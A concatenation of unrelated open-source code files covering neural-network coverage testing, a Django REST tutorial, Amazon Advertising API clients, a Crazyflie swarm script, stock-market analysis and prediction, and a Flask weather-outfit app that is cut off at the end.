backup_status(module)
yield module
recover_status(module)
``` |
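Two quick, self-contained checks of the helpers above (my own sketch, not part of YOLOX): a fused convolution should reproduce `conv` followed by `bn` in eval mode, and `replace_module` can swap activation modules recursively — the SiLU-to-ReLU swap is only an illustration of the deploy use case:
```python
import torch
import torch.nn as nn

# fuse_conv_and_bn: outputs should match conv -> bn once bn uses its running stats.
conv = nn.Conv2d(3, 8, kernel_size=3, padding=1, bias=False)
bn = nn.BatchNorm2d(8).eval()
fused = fuse_conv_and_bn(conv, bn)
x = torch.randn(1, 3, 32, 32)
with torch.no_grad():
    assert torch.allclose(bn(conv(x)), fused(x), atol=1e-5)

# replace_module: recursively replace every SiLU with a ReLU (illustrative choice).
model = nn.Sequential(nn.Conv2d(3, 8, 3), nn.SiLU(), nn.Conv2d(8, 8, 3), nn.SiLU())
deploy_model = replace_module(model, nn.SiLU, nn.ReLU)
```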
{
"source": "853108389/DeepConcolic",
"score": 2
} |
#### File: DeepConcolic/src/nc_l0.py
```python
from numpy import linalg as LA
import time
import os
import sys
import numpy as np
from utils import *
from l0_encoding import *
def l0_negate(dnn, layer_functions, test, nc_layer, pos):
idx_min = 0
idx_max = 10
gran = 2
mani_range = 100
adv = 0
(row, col, chl) = test[0].shape
tic=time.time()
sorted_pixels=sort_pixels(dnn, layer_functions, test[0], nc_layer, pos, gran)
(act_images, idx_first, success_flag) = accumulate(dnn, layer_functions, test[0], nc_layer, pos, sorted_pixels, mani_range)
elapsed=time.time()-tic
#print ('\n == Elapsed time: ', elapsed)
result=[]
if success_flag:
act_image_first=act_images[0]
refined_act_image=refine_act_image(dnn, layer_functions, test[0], nc_layer, pos, sorted_pixels, act_image_first, idx_first)
image_diff = np.abs(refined_act_image - test[0])
L0_distance = (image_diff * 255 > 1).sum()
L1_distance = image_diff.sum()
L2_distance = LA.norm(image_diff)
return True, L0_distance, refined_act_image
return False, None, None
```
#### File: DeepConcolic/src/nc_setup.py
```python
from datetime import datetime
import os
import keras
from keras.models import *
from keras.datasets import cifar10
from keras.datasets import mnist
from keras.applications.vgg16 import VGG16
from keras.preprocessing.image import load_img
from keras.layers import *
from keras import *
from utils import *
from nc_lp import *
from lp_encoding import *
def nc_setup(test_object, outs):
print('\n== {0}, {1} ==\n'.format(test_object.criterion, test_object.norm))
if not os.path.exists(outs):
os.system('mkdir -p {0}'.format(outs))
if not outs.endswith('/'):
outs+='/'
nc_results=outs+'nc_{0}_report-{1}.txt'.format(test_object.norm, str(datetime.now()).replace(' ', '-'))
nc_results=nc_results.replace(':', '-')
layer_functions=get_layer_functions(test_object.dnn)
print('\n== Got layer functions: {0} ==\n'.format(len(layer_functions)))
cover_layers=get_cover_layers(test_object.dnn, 'NC')
print('\n== Got cover layers: {0} ==\n'.format(len(cover_layers)))
tot_size=len(test_object.raw_data.data)
activations=None
batches=np.array_split(test_object.raw_data.data[0:tot_size], tot_size//1000 + 1)
for i in range(0, len(batches)):
batch=batches[i]
sub_acts=eval_batch(layer_functions, batch, is_input_layer(test_object.dnn.layers[0]))
if i==0:
activations=sub_acts
else:
for j in range(0, len(activations)):
activations[j]=np.concatenate((activations[j], sub_acts[j]), axis=0)
calculate_pfactors(activations, cover_layers)
#### configuration phase done
test_cases=[]
adversarials=[]
xdata=test_object.raw_data.data
iseed=np.random.randint(0, len(xdata))
im=xdata[iseed]
test_cases.append(im)
update_nc_map_via_inst(cover_layers, eval(layer_functions, im, is_input_layer(test_object.dnn.layers[0])), (test_object.layer_indices, test_object.feature_indices))
covered, not_covered=nc_report(cover_layers, test_object.layer_indices, test_object.feature_indices)
print('\n== The initial neuron coverage: {0}==\n'.format(covered*1.0/(covered+not_covered)))
save_an_image(im/test_object.inp_ub*1.0, 'seed-image', outs)
f = open(nc_results, "a")
f.write('NC-cover: {0} #test cases: {1} #adversarial examples: {2}\n'.format(1.0 * covered / (covered + not_covered), len(test_cases), len(adversarials)))
f.close()
#for i in range(0, len(cover_layers)):
# cover_layers[i].initialize_ssc_map((test_object.layer_indices, test_object.feature_indices))
return nc_results, layer_functions, cover_layers, activations, test_cases, adversarials
def ssc_setup(test_object, outs):
print('\n== MC/DC (ssc) coverage for neural networks ==\n')
if not os.path.exists(outs):
os.system('mkdir -p {0}'.format(outs))
if not outs.endswith('/'):
outs+='/'
nc_results=outs+'ssc_report-{0}.txt'.format(str(datetime.now()).replace(' ', '-'))
nc_results=nc_results.replace(':', '-')
layer_functions=get_layer_functions(test_object.dnn)
print('\n== Total layers: {0} ==\n'.format(len(layer_functions)))
cover_layers=get_cover_layers(test_object.dnn, 'SSC')
print('\n== Cover-able layers: {0} ==\n'.format(len(cover_layers)))
for i in range(0, len(cover_layers)):
cover_layers[i].initialize_ubs()
cover_layers[i].initialize_ssc_map((test_object.layer_indices, test_object.feature_indices))
#print ("to compute the ubs")
activations=None
if not test_object.training_data is None:
for x in test_object.training_data:
x_acts=eval_batch(layer_functions, np.array([x]), is_input_layer(test_object.dnn.layers[0]))
for i in range(1, len(cover_layers)):
#print (type(x_acts[cover_layers[i].layer_index][0]))
#print (type(cover_layers[i].ubs))
cover_layers[i].ubs=np.maximum(cover_layers[i].ubs, x_acts[cover_layers[i].layer_index][0])
#print ("done")
# tot_size=len(test_object.training_data)
# batches=np.array_split(test_object.training_data[0:tot_size], tot_size//10 + 1)
# for i in range(0, len(batches)):
# batch=batches[i]
# sub_acts=eval_batch(layer_functions, batch, is_input_layer(test_object.dnn.layers[0]))
# if i==0:
# activations=sub_acts
# else:
# for j in range(0, len(activations)):
# activations[j]=np.concatenate((activations[j], sub_acts[j]), axis=0)
return nc_results, layer_functions, cover_layers, activations
``` |
{
"source": "853695319/rest_framework_tutorial",
"score": 3
} |
#### File: rest_framework_tutorial/snippets/views.py
```python
from django.contrib.auth.models import User
from rest_framework import permissions, renderers, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from .models import Snippet
from .permissions import IsOwnerOrReadOnly
from .serializers import SnippetModelSerializer, UserModelSerializer
class SnippetViewSet(viewsets.ModelViewSet):
"""此视图自动提供`list`, `create`, `retrieve`, `update`和`destroy`操作
另外我们还提供了一个额外的`highlight`操作"""
queryset = Snippet.objects.all()
serializer_class = SnippetModelSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
# 使用`@action`装饰器创建一个名为`highlight`的自定义*操作*
# 这个装饰器可用于条件不符合标准`create`/`update`/`delete`样式的任何自定义路径
# 默认情况小,使用`@action`装饰器的自定义操作将响应`GET`请求。
# 如果我们想要一个响应`POST`请求的动作,我们可以使用`method`参数
# 默认情况下,自定义操作的URL取决于方法名称本身。
# 如果要更改URL的构造方式,可以为装饰器设置url_path关键字参数
@action(detail=True, renderer_classes=[renderers.StaticHTMLRenderer])
def highlight(self, request, *args, **kwargs):
snippet = self.get_object()
return Response(snippet.highlighted)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""只读 此视图自动提供`list`和`detail`操作"""
queryset = User.objects.all()
serializer_class = UserModelSerializer
``` |
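To make the translated comments above concrete, here is a hypothetical extra viewset that uses both options they mention: responding to `POST` instead of `GET`, and overriding the generated URL segment with `url_path`. This class is not part of the tutorial and assumes the tutorial's `title` field on `Snippet`:
```python
from rest_framework import permissions, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response

from .models import Snippet
from .serializers import SnippetModelSerializer


class SnippetRetitleViewSet(viewsets.ModelViewSet):
    """Hypothetical viewset: a POST-only action reachable at .../{pk}/set-title/."""
    queryset = Snippet.objects.all()
    serializer_class = SnippetModelSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    @action(detail=True, methods=['post'], url_path='set-title')
    def set_title(self, request, *args, **kwargs):
        snippet = self.get_object()
        snippet.title = request.data.get('title', '')
        snippet.save()
        return Response({'title': snippet.title})
```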
{
"source": "854350999/python-amazon-ad-api",
"score": 2
} |
#### File: ad_api/sp_brands/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_recommendations_targets(self, params):
self.uri_path = "/sb/recommendations/targets/product/list"
self.method = "post"
self.data = params
return self.execute()
def get_recommendations_targets_category(self, params):
self.uri_path = "/sb/recommendations/targets/category"
self.method = "post"
self.data = params
return self.execute()
def get_recommendations_targets_brand(self, params):
self.uri_path = "/sb/recommendations/targets/brand"
self.method = "post"
self.data = params
return self.execute()
```
#### File: ad_api/sp_display/adgroups.py
```python
from ..client import Client
class AdGroups(Client):
def get_ad_groups(self, params):
self.method = "get"
self.uri_path = "/sd/adGroups"
self.data = params
return self.execute()
def update_ad_groups(self, params):
self.uri_path = "/sd/adGroups"
self.method = "put"
self.data = params
return self.execute()
def create_ad_groups(self, params):
self.uri_path = "/sd/adGroups"
self.method = "post"
self.data = params
return self.execute()
def get_ad_group_by_id(self, ad_group_id):
self.method = "get"
self.uri_path = "/sd/adGroups/{}".format(ad_group_id)
return self.execute()
def delete_ad_group_by_id(self, ad_group_id):
self.uri_path = "/sd/adGroups/{}".format(ad_group_id)
self.method = "delete"
return self.execute()
def get_ad_group_extended(self, params):
self.method = "get"
self.uri_path = "/sd/adGroups/extended"
self.data = params
return self.execute()
def get_ad_group_extended_by_id(self, ad_group_id):
self.method = "get"
self.uri_path = "/sd/adGroups/extended/{}".format(ad_group_id)
return self.execute()
```
#### File: ad_api/sp_display/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_targets_recommendations(self, params):
self.uri_path = "/sd/targets/recommendations"
self.method = "post"
self.data = params
return self.execute()
```
#### File: ad_api/sp_products/cam_neg_keywords.py
```python
from ..client import Client
class CampNegKeywords(Client):
def get_camp_neg_keywords_by_id(self, keyword_id):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/{}".format(keyword_id)
return self.execute()
def delete_camp_neg_keywords_by_id(self, keyword_id):
self.uri_path = "/v2/sp/campaignNegativeKeywords/{}".format(keyword_id)
self.method = "delete"
return self.execute()
def get_camp_neg_keywords_extended_by_id(self, keyword_id):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/extended/{}".format(keyword_id)
return self.execute()
def get_camp_neg_keywords_extended(self, params):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/extended"
self.data = params
return self.execute()
def get_camp_neg_keywords(self, params):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
return self.execute()
def create_camp_neg_keywords(self, params):
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
self.method = "post"
return self.execute()
def update_camp_neg_keywords(self, params):
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
self.method = "put"
return self.execute()
```
#### File: ad_api/sp_products/neg_targeting.py
```python
from ..client import Client
class NegProductTargets(Client):
def create_neg_targets(self, params):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "post"
self.data = params
return self.execute()
def update_neg_targets(self, params):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "put"
self.data = params
return self.execute()
def get_neg_targets(self, params):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets"
self.data = params
return self.execute()
def get_neg_targets_by_id(self, target_id):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
return self.execute()
def delete_neg_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "delete"
return self.execute()
def get_neg_targets_extended(self, params):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/extended"
self.data = params
return self.execute()
def get_neg_targets_extended_by_id(self, target_id):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/extended/{}".format(target_id)
return self.execute()
``` |
{
"source": "854350999/python-amazon-advertising-api",
"score": 2
} |
#### File: ad_api/common/product_metadata.py
```python
from ..client import Client
class ProductMetadata(Client):
def get_product_metadata(self, data):
self.uri_path = "/product/metadata"
self.method = "post"
self.data = data
return self.execute()
```
#### File: ad_api/sp_brands/drafts.py
```python
from ..client import Client
class Drafts(Client):
def get_drafts_campaign(self, start_index: int = 0, count: int = None, name: str = None,
draft_campaign_id_filter: str = None, portfolio_id_filter: str = None,
ad_format_filter: str = None):
self.method = "get"
self.uri_path = "/sb/drafts/campaigns"
self.params = {
"startIndex": start_index,
"count": count,
"name": name,
"draftCampaignIdFilter": draft_campaign_id_filter,
"portfolioIdFilter": portfolio_id_filter,
"adFormatFilter": ad_format_filter
}
return self.execute()
def create_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns"
self.method = "post"
self.data = data
return self.execute()
def update_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns"
self.method = "put"
self.data = data
return self.execute()
def get_drafts_campaign_by_id(self, draft_campaign_id):
self.method = "get"
self.uri_path = "/sb/drafts/campaigns/{}".format(draft_campaign_id)
return self.execute()
def delete_drafts_campaign_by_id(self, draft_campaign_id):
self.uri_path = "/sb/drafts/campaigns/{}".format(draft_campaign_id)
self.method = "delete"
return self.execute()
def submit_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns/submit"
self.method = "post"
self.data = data
return self.execute()
```
#### File: ad_api/sp_brands/media.py
```python
from ..client import Client
class Media(Client):
def create_media_upload(self, program_type: str = "SponsoredBrands", creative_type: str = "Video"):
self.uri_path = "/media/upload"
self.method = "post"
self.data = {
"programType": program_type,
"creativeType": creative_type
}
return self.execute()
def update_media_upload(self, upload_location: str, version: str = None):
self.uri_path = "/media/complete"
self.method = "put"
self.data = {
"uploadLocation": upload_location,
"version": version
}
return self.execute()
def get_media_describe(self, media_id):
self.method = "get"
self.uri_path = "/media/describe"
self.headers["mediaId"] = media_id
return self.execute()
```
#### File: ad_api/sp_brands/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_recommendations_targets(self, next_token: str = None, max_results: int = None, filters: list = None):
self.uri_path = "/sb/recommendations/targets/product/list"
self.method = "post"
self.data = {
"nextToken": next_token,
"maxResults": max_results,
"filters": filters
}
return self.execute()
def get_recommendations_targets_category(self, asins):
self.uri_path = "/sb/recommendations/targets/category"
self.method = "post"
self.data = {
"asins": asins
}
return self.execute()
def get_recommendations_targets_brand(self, category_id: int = None, keyword: str = None):
self.uri_path = "/sb/recommendations/targets/brand"
self.method = "post"
self.data = {
"categoryId": category_id,
"keyword": keyword
}
return self.execute()
```
#### File: ad_api/sp_display/reports.py
```python
from ..client import Client
class Reports(Client):
def request_report(self, record_type, data):
self.uri_path = "/sd/{}/report".format(record_type)
self.method = "post"
self.data = data
return self.execute()
def get_report(self, report_id):
self.uri_path = "/v2/reports/{}".format(report_id)
self.method = "get"
return self.execute()
def get_report_download_url(self, location):
self.method = "get"
return self.execute_download(location)
def get_report_download(self, report_id):
self.uri_path = "/v2/reports/{}/download".format(report_id)
self.method = "get"
self.headers.pop("Content-Type")
self.headers["Accept-encoding"] = "gzip"
return self.execute()
```
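A minimal sketch of how the request/poll/download cycle above might be driven, assuming `execute()` returns the parsed JSON response; the `reportId` and `status` field names follow the v2 reporting convention but are assumptions here, as is the polling interval.
```python
import time
def fetch_sd_report(reports, record_type, report_request):
    """reports: an already-configured Reports instance (construction depends on the Client base class)."""
    created = reports.request_report(record_type, report_request)
    report_id = created.get("reportId")                           # assumed field name
    while True:
        status = reports.get_report(report_id)
        if status.get("status") in ("SUCCESS", "FAILURE"):        # assumed status values
            break
        time.sleep(5)
    # the download endpoint returns the gzipped report payload
    return reports.get_report_download(report_id)
```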
#### File: ad_api/sp_products/negative_product_targeting.py
```python
from ..client import Client
class NegativeProductTargeting(Client):
def create_negative_targets(self, data):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "post"
self.data = data
return self.execute()
def update_negative_targets(self, data):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "put"
self.data = data
return self.execute()
def get_negative_targets(self, start_index: int = 0, count: int = None, state_filter: str = None,
campaign_id_filter: str = None, ad_group_id_filter: str = None,
target_id_filter: str = None):
self.uri_path = "/v2/sp/negativeTargets"
self.params = {
"startIndex": start_index,
"count": count,
"stateFilter": state_filter,
"campaignIdFilter": campaign_id_filter,
"adGroupIdFilter": ad_group_id_filter,
"targetIdFilter": target_id_filter
}
self.method = "get"
return self.execute()
def get_negative_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "get"
return self.execute()
def delete_negative_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "delete"
return self.execute()
def get_negative_targets_extended(self, start_index: int = 0, count: int = None, state_filter: str = None,
campaign_id_filter: str = None, ad_group_id_filter: str = None,
target_id_filter: str = None):
self.uri_path = "/v2/sp/negativeTargets/extended"
self.method = "get"
self.params = {
"startIndex": start_index,
"count": count,
"stateFilter": state_filter,
"campaignIdFilter": campaign_id_filter,
"adGroupIdFilter": ad_group_id_filter,
"targetIdFilter": target_id_filter
}
return self.execute()
def get_negative_targets_extended_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/extended/{}".format(target_id)
self.method = "get"
return self.execute()
``` |
{
"source": "854768750/crazyflie_ros",
"score": 3
} |
#### File: scripts/swarm/swarm.py
```python
import csv
import rospy
import math
import tf
import numpy as np
import time
from tf import TransformListener
from geometry_msgs.msg import PoseStamped
class Swarm():
    def __init__(self):
        rospy.init_node('demo', anonymous=True)
        self.worldFrame = rospy.get_param("~worldFrame", "/world")
        self.frame = rospy.get_param("~frame")
        self.pubGoal = rospy.Publisher('goal', PoseStamped, queue_size=1)
        self.listener = TransformListener()
        self.goalIndex = 1
        self.index = 1
        # read the waypoint table once and keep it on the instance
        with open('test.csv', 'rb') as myfile:
            reader = csv.reader(myfile)
            self.lines = [line for line in reader]
    def run(self):
        self.listener.waitForTransform(self.worldFrame, self.frame, rospy.Time(), rospy.Duration(5.0))
        goal = PoseStamped()
        goal.header.seq = 0
        goal.header.frame_id = self.worldFrame
        while not rospy.is_shutdown():
            goal.header.seq += 1
            goal.header.stamp = rospy.Time.now()
            # CSV cells are strings; convert to float for metric coordinates
            goal.pose.position.x = float(self.lines[self.goalIndex][3*self.index-1])
            goal.pose.position.y = float(self.lines[self.goalIndex][3*self.index+0])
            goal.pose.position.z = float(self.lines[self.goalIndex][3*self.index+1])
            quaternion = tf.transformations.quaternion_from_euler(0, 0, 0)
            goal.pose.orientation.x = quaternion[0]
            goal.pose.orientation.y = quaternion[1]
            goal.pose.orientation.z = quaternion[2]
            goal.pose.orientation.w = quaternion[3]
            self.pubGoal.publish(goal)
            t = self.listener.getLatestCommonTime(self.worldFrame, self.frame)
            if self.listener.canTransform(self.worldFrame, self.frame, t):
                position, quaternion = self.listener.lookupTransform(self.worldFrame, self.frame, t)
                rpy = tf.transformations.euler_from_quaternion(quaternion)
                if math.fabs(position[0] - goal.pose.position.x) < 0.25 \
                        and math.fabs(position[1] - goal.pose.position.y) < 0.25 \
                        and math.fabs(position[2] - goal.pose.position.z) < 0.25 \
                        and self.goalIndex < len(self.lines) - 1:
                    # hold for the dwell time (seconds) given in the CSV, then advance to the next waypoint
                    rospy.sleep(float(self.lines[self.goalIndex][1]))
                    self.goalIndex += 1
if __name__ == '__main__':
demo = Swarm()
demo.run()
``` |
{
"source": "85599/my-first-contact-app",
"score": 2
} |
#### File: my-first-contact-app/contact/models.py
```python
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
from django.utils import timezone
class Person(models.Model):
first_name = models.CharField(max_length=20)
last_name = models.CharField(max_length=20)
email = models.EmailField(max_length=250)
    phone = PhoneNumberField()
    # publish() stores a timestamp, so the model needs a field to persist it
    published_date = models.DateTimeField(blank=True, null=True)
    def publish(self):
        self.published_date = timezone.now()
        self.save()
def full_name(self):
return '{} {}'.format(self.first_name, self.last_name)
def __str__(self):
return self.full_name()
``` |
{
"source": "85599/Niftytechnical-analysis",
"score": 3
} |
#### File: 85599/Niftytechnical-analysis/analysis.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from nsepy import get_history
from datetime import datetime as dt
plt.style.use("seaborn")
start_date = dt(2000,1,1)
end_date = dt.now()
# df = get_history("Nifty",start_date,end_date,index=True)
# print(df.tail())
# df.to_csv("Nifty50.csv")
def eichermot():
df = pd.read_csv("./data/EICHERMOT.csv",parse_dates=True,index_col=0)
df = df.resample('W').mean()
# print(df.head())
fig = plt.figure(figsize=(12,6))
plt.plot(df.index,df['Close'])
plt.xlabel("Year")
plt.ylabel("Price")
plt.title("Eichermotors stock price over the years")
# plt.show()
#Calculate a 50 day moving average
df['50ma'] = df['Close'].rolling(window=50).mean()
print(df.tail())
fig = plt.figure(figsize=(12,6))
ax1 = plt.subplot2grid((6,1),(0,0),rowspan=5,colspan=1)
ax2 = plt.subplot2grid((6,1),(5,0),rowspan=1,colspan=1,sharex=ax1)
ax1.plot(df.index,df['Close'])
ax1.plot(df.index,df['50ma'])
ax2.plot(df.index,df['Volume'])
plt.show()
df = pd.read_csv("./Nifty50_combined.csv",parse_dates=True,index_col=0)
df = df["2010-01-01":"2019-12-31"]
print(df.head())
def get_insights():
print("Summary Statistics of 50 stocks:")
print(df.describe().T)
#Plot average price of stocks
summary = df.describe().T
fig = plt.figure(figsize=(8,12))
plt.barh(summary.index,summary['mean'])
plt.title("Average price of Stocks")
plt.ylabel("Stocks")
plt.xlabel("Average price")
# plt.show()
#calculate simple returns or percentage returns of the stocks
fig2 = plt.figure()
df.pct_change().mean().plot(figsize=(10,6),kind='bar')
plt.xlabel("Stocks")
plt.ylabel("Percentage Change")
plt.title("Simple returns")
# plt.show()
#calculate and plot the log returns
rets = np.log(df/df.shift(1))
rets[rets.columns[30:45]].cumsum().apply(np.exp).plot(figsize=(10,6))
plt.title("Log returns")
# plt.show()
    # select some well-performing stocks over time
print(df.columns)
stocks = df[['SHREECEM','BAJAJFINSV','EICHERMOT','INDUSINDBK','HINDUNILVR']]
ax = stocks.plot(figsize=(10,8),subplots=True,title="Well performing stocks over the past years")
ax[2].set_ylabel("Stock Price")
# plt.show()
    # Simple moving average strategy
#Rolling statistics
tick = "SHREECEM"
EM = df[:][tick].reset_index()
EM.set_index('Date',inplace=True)
# print(EM.head())
window = 30
#calculate mean,median,max,std_dev for the selected stock data
EM['min'] = EM[tick].rolling(window=window).min()
EM['max'] = EM[tick].rolling(window=window).max()
EM['mean'] = EM[tick].rolling(window=window).mean()
EM['std'] = EM[tick].rolling(window=window).std()
EM['median'] = EM[tick].rolling(window=window).median()
ax = EM[['min','mean','max']].iloc[-750:-350].plot(figsize=(10,6), style=['g--','r--','g--'], lw=0.8)
EM[tick].iloc[-750:-350].plot(ax=ax, lw=2)
plt.xlabel("Date")
plt.ylabel("Price")
plt.title("30 days max min simple moving average")
# plt.show()
# moving average cross over
EM['SMA1'] = EM[tick].rolling(window=52).mean()
EM['SMA2'] = EM[tick].rolling(window=252).mean()
EM.dropna(inplace=True)
EM['positions'] = np.where(EM['SMA1']>EM['SMA2'],1,-1)
ax = EM[[tick,'SMA1','SMA2','positions']].plot(figsize=(10,6), secondary_y='positions')
ax.get_legend().set_bbox_to_anchor((0.25, 0.85))
    plt.title('SMA crossover strategy')
plt.show()
# Correlation
def get_correlation():
df_corr = df.corr()
print(df_corr.head())
corr_data = df_corr.values
fig = plt.figure()
ax1 = fig.add_subplot(111)
heatmap1 = ax1.pcolor(corr_data, cmap=plt.cm.RdYlGn)
fig.colorbar(heatmap1)
ax1.set_xticks(np.arange(corr_data.shape[1]) + 0.5, minor=False)
ax1.set_yticks(np.arange(corr_data.shape[0]) + 0.5, minor=False)
ax1.invert_yaxis()
ax1.xaxis.tick_top()
column_labels = df_corr.columns
row_labels = df_corr.index
ax1.set_xticklabels(column_labels)
ax1.set_yticklabels(row_labels)
plt.xticks(rotation=90)
heatmap1.set_clim(-1,1)
plt.tight_layout()
plt.title("Correlation plot")
plt.show()
def correlated_stocks():
    data = df[["ICICIBANK","EICHERMOT"]]
    # use a window inside the 2010-2019 range selected above; the original 2021 dates fall outside it
    data["2019-01-01":"2019-01-25"].plot(secondary_y="EICHERMOT",figsize=(10,6))
plt.title("ICICIvsEICHER")
plt.show()
#Function call to get the summary statistics of the data and plots
get_insights()
#Function call to plot the correlation among the 50 stocks
get_correlation()
#Function call to visualize example correlated stocks
correlated_stocks()
``` |
{
"source": "85599/nse-django",
"score": 3
} |
#### File: nse-django/home/stock_model.py
```python
import os
import pandas as pd
from sklearn import linear_model
from nsetools import Nse
import pathlib
import joblib
nse = Nse()
def nse_data(stock_name):
    '''input stock_name : str
    output : list = [open, dayHigh, dayLow]'''
data = nse.get_quote(stock_name)
current = [data['open'],data['dayHigh'],data['dayLow']]
return current
def model_check(stock_name):
    '''Check whether a saved model already exists for this stock;
    input stock_name : str
    returns True or False'''
    # keep the lookup path consistent with the one used in any_stock() below
    model_path = pathlib.Path(os.getcwd() + "\\home\\nse_data\\saved_model\\" + stock_name + '.pkl')
if model_path.exists():
return True
else:
return False
def any_stock(stock_name):
'''function to predict any stock values
stock_name == str; today_value= list,[open,high,low]
'''
try:
if model_check(stock_name) == False:
data_path = os.getcwd()+"\\home\\nse_data\\HISTORICAL_DATA\\"
df = pd.read_csv(data_path + stock_name + '_data.csv')
df.fillna(df.mean(),inplace=True)
X = df.iloc[:,[1,2,3]]
y = df.iloc[:,[4]]
reg = linear_model.LinearRegression()
reg.fit(X,y)
y_today = reg.predict([nse_data(stock_name)])
model_path_one = os.getcwd()+"\\home\\nse_data\\saved_model\\"
joblib_file = model_path_one + stock_name+ ".pkl"
joblib.dump(reg, joblib_file)
print('model creation')
return y_today[0][0]
else:
print('model loading')
model_path_one = os.getcwd()+"\\home\\nse_data\\saved_model\\"
joblib_file = model_path_one + stock_name+ ".pkl"
model = joblib.load(joblib_file)
y_today = model.predict([nse_data(stock_name)])
return y_today
except:
return (" internal error")
# try:
# print(any_stock('SBIN'))
# except IndexError:
# print('index error')
# except FileNotFoundError:
# print("no file")
``` |
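For illustration only, a sketch of how `any_stock` might be called outside the Django views; the ticker is just an example, and the import path assumes the `home` package layout implied by the paths above plus the presence of the historical CSV data.
```python
# hypothetical standalone usage; run from the project root on Windows (the paths above are Windows-style)
from home.stock_model import any_stock
if __name__ == "__main__":
    predicted_close = any_stock("SBIN")
    print("Predicted close for SBIN:", predicted_close)
```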
{
"source": "85599/outerweather",
"score": 3
} |
#### File: 85599/outerweather/controller.py
```python
import random
from datetime import datetime
import model as m
from flask import Flask, render_template, request, redirect, session, url_for
app = Flask(__name__)
app.secret_key = 'daniel is cool'
HUMANIZE_USE_UTC = True
@app.route('/',methods=['GET'])
@app.route('/menu',methods=['GET'])
def menu():
if request.method=="GET":
return render_template('menu.html')
else:
return render_template('menu.html')
@app.route('/weather', methods=['GET','POST'])
def weather():
if request.method=="GET":
return render_template('weather.html')
elif request.method=="POST":
submitted_city = request.form['city']
check_valid_city = m.check_status_code(submitted_city)
if check_valid_city == True:
session['submitted_city'] = submitted_city
return redirect('/outfits')
else:
return redirect('/weather')
@app.route('/outfits', methods=['GET','POST'])
def outfits():
if request.method=="GET":
submitted_city = session.get('submitted_city', None)
result = m.getWeather(submitted_city)
random.seed(datetime.now())
random_num = random.randint(0, 4)
cold_footwear = ["Boots", "Hiking Boots", "Uggs", "Winter Moccasins", "Leather Shoes"]
cold_top = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat"]
cold_accessories = ["Hat", "Toque", "Mittens", "Gloves", "Scarf", "Thermal Base Layers"]
cold_bottoms = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis"]
mild_footwear = ["Running Shoes", "Dress Shoes", "Slip-On Casual Shoes", "Slides", "Heels"]
mild_top = ["T-Shirt", "Long-Sleeve Shirt", "Light Sweatshirt", "Jean Jacket", "Dress Shirt"]
mild_accessories = ["Baseball Cap", "Headband", "Parasol", "Bucket Hat", "Watch"]
mild_bottoms = ["Sweatpants", "Long Skirt", "Jeans", "Cargo Pants", "Dress Pants", "Leggings"]
hot_footwear = ["Flip-Flops", "Sandals", "Slides", "Running Shoes", "Slip-On Casual Shoes"]
hot_top = ["Tank Top", "T-Shirt", "Undershirt", "Polo", "Blouse"]
hot_accessories = ["Fan", "Water Bottle", "Sunscreen", "Parasol", "Sunglasses"]
hot_bottoms = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Trackpants", "Athletic Shorts"]
jackets = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Jean Jacket"]
t_shirt = ["T-Shirt", "Tank Top", "Undershirt", "Polo"]
long_sleeve_shirt = ["Long-Sleeve Shirt", "Light Sweatshirt", "Dress Shirt", "Blouse"]
boots = ["Boots", "Hiking Boots", "Uggs", "Leather Shoes"]
joggers = ["Running Shoes", "Slip-On Casual Shoes"]
sandals = ["Slides", "Flip-Flops", "Sandals"]
        miscellaneous_shoes = ["Winter Moccasins", "Dress Shoes"]
full_length = ["Jeans", "Sweatpants", "Khakis", "Long Skirt", "Cargo Pants", "Dress Pants"]
half_length = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Athletic Shorts"]
weather = ["Thunderstorm", "Drizzle", "Rain", "Snow", "Atmosphere", "Clear", "Clouds"]
return render_template('outfits.html', city = submitted_city, result = result, randomInt = random_num, coldFootwear = cold_footwear,
coldBottoms = cold_bottoms, coldTop = cold_top, coldAccessories = cold_accessories,
mildFootwear = mild_footwear, mildTop = mild_top, mildAccessories = mild_accessories, mildBottoms = mild_bottoms,
hotFootwear = hot_footwear, hotTop = hot_top, hotAccessories = hot_accessories, hotBottoms = hot_bottoms,
jacketsIcon = jackets, tShirtIcon = t_shirt, longSleeveIcon = long_sleeve_shirt, bootsIcon = boots,
